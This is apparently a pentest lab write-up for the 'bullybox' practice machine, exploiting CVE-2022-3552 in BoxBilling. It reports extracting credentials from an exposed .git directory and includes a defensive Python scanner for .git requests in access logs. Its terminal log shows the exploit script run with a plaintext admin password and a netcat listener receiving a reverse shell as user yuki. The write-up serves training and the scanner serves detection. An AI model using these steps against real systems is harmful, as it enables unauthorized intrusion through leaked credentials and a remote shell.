CVE-2022-3552


The BoxBilling instance in question is suspected to be vulnerable to CVE-2022-3552 because it runs an outdated version. Left unaddressed, this vulnerability exposes the system to compromise.

Furthermore, a .git directory was discovered within the instance. It contained a configuration file from which database credentials were extracted. Since credentials are often reused across services, these credentials can be leveraged in an exploitation attempt. Proper mitigation measures (removing the .git directory from the web root, denying access to dot-directories at the web server, and rotating the leaked credentials) should be considered to prevent unauthorized access and secure sensitive information.
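The exposed .git directory described above would show up in the web server's access log as requests for paths under `/.git/`. The following detection, added here as an example and not part of the original write-up, parses combined-format access log lines (Apache/nginx style, an assumption), flags any request into a `.git` directory, and separates requests the server actually served (a confirmed exposure) from ones it blocked (a probe). It also decodes percent-encoded paths so that `/%2Egit/HEAD` is not missed. The log lines are constructed for this example and use documentation IP ranges.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: ip ident user [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return 'served', 'blocked', or None if the request did not touch a .git directory."""
    # Strip the query string and decode percent-encoding before matching,
    # so encoded variants of the path are classified the same way.
    path = unquote(entry["path"].split("?", 1)[0])
    if "/.git/" not in path and not path.endswith("/.git"):
        return None
    return "served" if 200 <= entry["status"] < 300 else "blocked"


def scan(lines):
    """Scan log lines; return served/blocked .git requests and a per-IP hit count."""
    served, blocked = [], []
    by_ip = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # skip malformed lines rather than crash mid-log
        verdict = classify(entry)
        if verdict is None:
            continue
        by_ip[entry["ip"]] += 1
        record = (entry["ip"], entry["path"], entry["status"])
        (served if verdict == "served" else blocked).append(record)
    return {"served": served, "blocked": blocked, "by_ip": by_ip}


# Constructed sample log lines (not from the target in the write-up).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jun/2023:17:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/7.88.1"',
    '203.0.113.7 - - [10/Jun/2023:17:01:03 +0000] "GET /.git/config HTTP/1.1" 200 312 "-" "curl/7.88.1"',
    '203.0.113.7 - - [10/Jun/2023:17:01:05 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jun/2023:17:02:10 +0000] "GET /%2Egit/HEAD HTTP/1.1" 403 199 "-" "python-requests/2.31"',
    '198.51.100.9 - - [10/Jun/2023:17:02:11 +0000] "GET /admin HTTP/1.1" 302 0 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for ip, path, status in result["served"]:
        print(f"EXPOSED  {ip} {path} -> {status}")
    for ip, path, status in result["blocked"]:
        print(f"probed   {ip} {path} -> {status}")
    print("hits per source IP:", dict(result["by_ip"]))
```

Any entry in the `served` list means the web server handed out repository metadata, so the repository (including any committed configuration file) should be treated as disclosed and the credentials in it rotated; the `blocked` list is useful for confirming that a deny rule for dot-directories is in place and working.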

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ python3 CVE-2022-3552/CVE-2022-3552.py --domain http://bullybox.local --email admin@bullybox.local --password 'Playing-Unstylish7-Provided'
[+] Successfully logged in
[+] Payload saved successfully
[+] Getting Shell

Executing the exploit script

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bullybox]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.27] 36588
Linux bullybox 5.15.0-75-generic #82-Ubuntu SMP Tue Jun 6 23:10:23 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
 17:02:47 up 45 min,  0 users,  load average: 0.00, 0.36, 2.63
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
yuki
$ hostname
bullybox
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:8d:47 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.154.27/24 brd 192.168.154.255 scope global ens160
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the yuki user by exploiting CVE-2022-3552.